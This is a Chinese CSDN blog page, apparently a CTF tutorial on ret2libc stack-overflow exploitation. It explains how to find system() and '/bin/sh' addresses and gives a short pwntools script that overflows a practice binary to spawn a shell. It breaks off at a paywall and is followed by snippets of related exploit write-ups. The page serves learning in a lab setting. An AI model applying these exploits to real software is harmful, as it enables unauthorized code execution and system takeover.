ret2libc pwn

最新推荐文章于 2023-05-08 23:46:55 发布
最新推荐文章于 2023-05-08 23:46:55 发布
阅读量804 收藏 14
点赞数 14
文章标签: 安全 linux python shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41560595/article/details/108829157
版权
本文详细介绍了三种类型的ret2libc攻击:有_system和/bin/sh、有_system但无/bin/sh以及无system也无/bin/sh。内容包括查看栈保护、动态链接库函数地址查找、利用延迟绑定机制构造payload等技术细节,旨在帮助读者理解ret2libc的利用方法。
摘要由CSDN通过智能技术生成

题型一 有_sysetem和/bin/sh

查看栈保护

在这里插入图片描述

F5查看源代码

在这里插入图片描述
看见gets函数,立刻想到是栈溢出题型,但是此题并未提供system("/bin/sh")函数。.plt表包含了程序中用到的所有动态链接库函数,也包含了system()函数,因此可以根据这个特性查找system()地址,构造system("/bin/sh")。
查看所有动态链接函数命令:

在这里插入图片描述

判断覆盖量

在这里插入图片描述

查找system()的地址

objdump -d -j .plt ./ret
在这里插入图片描述
为什么不直接使用system在got表中的地址,而使用在plt表中的地址?
在这里插入图片描述
在secure函数中,调用了一次system函数,但是main中却没有调用secure函数,所以got表中就不会有system函数地址。但是从plt到got部分可以经过一些列自动化操作解析出system真实地址。具体看题型三地址解析过程。

查找/bin/sh的地址

在这里插入图片描述

编写脚本

from pwn import *
p=process('./ret')
system_addr=0x08048460
system_ret_addr=0x00000000    #system的返回地址是随意写的
bin_sh=0x08048720
payload="A"*112+p32(system_addr)+p32(system_ret_addr)+p32(bin_sh)

p.sendline(payload)
p.interactive()

图解

在这里插入图片描述
大功告成

在这里插入图片描述

题型二 有_system但没有/bin/sh

查看源代码

在这里插入图片描述

查看_system地址

在这里插入图片描述

查看/bin/sh的地址

在这里插入图片描述

没找到,只能自己构造。

在这里插入图片描述
这一步的_system_addr用来当作gets函数的返回地址,其实这个返回地址无关紧要(gets函数执行完返回到哪里跟题目无关),只是后面要用到_system函数,所以摆在这里。
注:在rbp下面时,esp每指到一个函数,就会自动识别出下面的是返回地址和参数。
在这里插入图片描述

查看.bss段地址

因为.bss是可写可执行的,所以可以考虑把"/bin/sh"放入.bss段。注意:放入.bss段的是"/bin/sh"这个字符串
单击上方的灰色带,找到.b

最低0.47元/天 解锁文章
「已注销」
关注
  • 14
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
pwn入门系列-ret2libc2
小心信科理化声
12-10 3081
Ret2libc2 今天来做一下经典的retlibc系列的第二题 资源:ret2libc2 老样子先checksec [*] '/home/giantbranch/Desktop/pwn/ret2libc2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 可以看到
PWN —— ret2libc2
qq_41696518的博客
07-03 292
ret2libc2
PWN · ret2libc】ret2libc2
Mr_Fmnwon的博客
05-08 690
经过ret2libc1的洗礼,我们对ret2libc的做题模范有了基本的范式,然而实际的题目远没有如此直白和简单。本题就遇到了一个问题:"/bin/sh"字符串在程序中并不存在,怎么办?其实很简单:没有我们就自己输入。因为具体的原理在ret2libc1中已经很详细地讲述了,所以本篇博客主要复现解题过程。从最基本理解原理的ret2libc1,到有点花头的ret2libc2,值得展望的是,比赛的题目,远远难于此。但千里之行始于足下,掌握好这些基础的,掌握好这些原理,才能慢慢深入进阶。
pwn学习——ret2libc2
MrTreebook的博客
11-28 1064
pwn学习——ret2libc21.攻击原理2. ret2libc2的源代码3.checksec看一下保护4.exp 1.攻击原理 通过把函数返回地址直接指向系统库中的函数(如system函数),同时构造该函数的输入参数栈,就可以达到代码执行的目的。 正常堆栈布局: ret2libc执行system的堆栈布局: 本题和ret2libc1的区别就是程序中没有自带"/bin/sh",需要自己写进去 2. ret2libc2的源代码 #include <stdio.h> #include <
PWN —— ret2libc1
qq_41696518的博客
07-03 438
ret2libc1
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
16ret2libc1_32 pwn 入门题
02-11
pwn 入门题
带exp的pwn测试文件
09-12
这些文件涵盖了多种经典的漏洞利用技术,如ret2text、ret2syscall、ret2shellcode、ret2libc、ret2csu、stack_pivoting、stack_smash以及SROP(Secure Return Oriented Programming)和frame_faking。下面将详细介绍...
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2333
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
pwn》ret2libc2—x64简答例题+脚本加解析
Aiyflwoers的博客
03-28 717
题目地址:链接: https://pan.baidu.com/s/1isG2u-fpihbPt_Lumd4q5A?pwd=r9vn 提取码:r9vn 脚本展示: from pwn import* p=process('./babyrop') context.log_level='debug' gdb.attach(p) elf=ELF("./babyrop") libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") padding=0x28 pop_rdi_ret_addr=
CTF|HITCON-Training-master lab4 writeup (ret2libc题型)
skyattractive的博客
06-12 379
CTF|HITCON-Training-master lab4 writeup (ret2libc题型) 做题做题前先看看ctfwiki上对ret2libc的原理描述 原理 ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置(即函数对应的 got表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。 思路 总体思路就是我们遇到没有system没有"/bin/sh"的文件 我们
Ret2libc 1
weixin_44864859的博客
05-19 701
Ret2libc 1 题目代码和之前一样,gets函数存在栈溢出。同时也存在system函数,但是不同之处是我们不能直接跳转到system(“shell!?”)。因为我们要执行的是system(“bin/sh”)。 首先,我们可以在内存中搜索一下看有没有这个字符串 我们可以看到在0x8049720存在我们需要的字符串 那么,我们直接返回该处,即执行 system 函数。相应的 payload 如下 from pwn import * sh = process('./ret2libc1') binsh_
ret2libc1
m0_54262894的博客
10-30 148
需要原文件可以我要~ 拿到文件先checksec检查保护 放入ida中 查看main函数 发现了gets危险函数,可以利用 查看函数列表有一个secure函数,双击打开 发现了system命令 我们用Shift+F12查有无/bin/sh 到了 双击打开记下 /bin/sh 地址 0x08048720 有了/bin/sh,接下来寻system的地址 我们可以在最下面看到syst...
Ret2libc
iextract的博客
04-24 659
昨晚同学问了关于ret2libc时参数布置的问题,今天在此记录 假设熟悉stack overflow Ps:ret2libc是为了对抗DEP/NX产生 栈的布置在说明ret2libc之前,栈的布置需要提前说明一下,以以下简单代码为例#include <stdio.h>int trap(int x) { int y=0; y+=x; return y; }int m
pwn200,一道不完全考察ret2libc的小小pwn
shanwei274的博客
04-08 353
pwn200 —XDCTF-2015 每日一pwn,今天又做了一个pwn,那个pwn呢???攻防世界的进阶区里的一道小pwn题,虽然这个题考察的知识不多,rop链也比较好构建,但是还是让我又学到了一些东西,因为害怕忘记,写个博客记录记录。 1.获取pwn题 啪的一下就下载好了。 2.查看保护 拿到题我不做,哎,我干什么呢,我先查看保护! 裸奔题,开的东西不多,所以这里就看我们发挥了 3.ida看看 首先可以很明显的看到,给的7个变量,在栈中是连续排列的,一开始我还不知道给这里的七个数赋值到底有什么用,我
ret2libc
我多么希望明天有太阳,来灼烧我腐烂的梦想
08-12 687
ret2libc root@a1station:~/pwn/got# cat got.c #include <stdio.h> static int a; extern int b; extern void test(); int func() { a = 1; b = 2; return 0; } int main() { func(); ...
Ret2Libc 练习(1) -- ZwSetInformationProcess
weixin_30699955的博客
09-21 120
  花了两个小半晚上的时间将0day安全这本书的绕过DEP的第一个实验做了,这里做些笔记。   Ret2libc 我现在自己的理解就是在开启DEP保护的情况下,在程序的其他的可执行位置到可以满足我利用要求的指令,形成一个可执行的指令序列,达到成功执行shellcode的目的。   那么利用Ret2libc的第一个方法就是通过ZwSetInformationProcess函数,这个API可以直...
pwn ret2libc原理
最新发布
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值